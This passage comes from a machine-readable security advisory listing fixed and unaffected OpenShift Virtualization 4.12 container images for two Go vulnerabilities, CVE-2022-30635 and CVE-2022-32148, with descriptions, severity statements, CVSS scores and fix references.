"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107388", }, ], notes: [ { category: "description", text: "A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/gob: stack exhaustion in Decoder.Decode", title: "Vulnerability summary", }, { category: "other", text: "OpenShift Container Platform (OCP) starting from 4.10 stream is already compiled in the patched version of Go, hence is not affected by this vulnerability.The vulnerability has been rated as moderate instead of high because the vulnerability can only result in a minor denial of service.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30635", }, { category: "external", summary: "RHBZ#2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30635", url: "https://www.cve.org/CVERecord?id=CVE-2022-30635", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", }, { category: "external", summary: "https://go.dev/issue/53615", url: "https://go.dev/issue/53615", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/gob: stack exhaustion in Decoder.Decode", }, { cve: "CVE-2022-32148", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107383", }, ], notes: [ { category: "description", text: "A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", title: "Vulnerability summary", }, { category: "other", text: "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token, multi-factor authentication (MFA), which is coupled with account management controls, including integration with single sign-on (SSO), to ensure that user permissions are restricted to only the functions necessary for their roles. Access to sensitive information is explicitly authorized and enforced based on predefined access policies. Event logs are collected and processed for centralization, correlation, analysis, monitoring, reporting, alerting, and retention. This process ensures that audit logs are generated for specific events involving sensitive information, which helps identify patterns of unauthorized access or data exposure. The platform enforces the use of validated cryptographic modules across compute resources to protect the confidentiality of information, even in the event of interception.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", 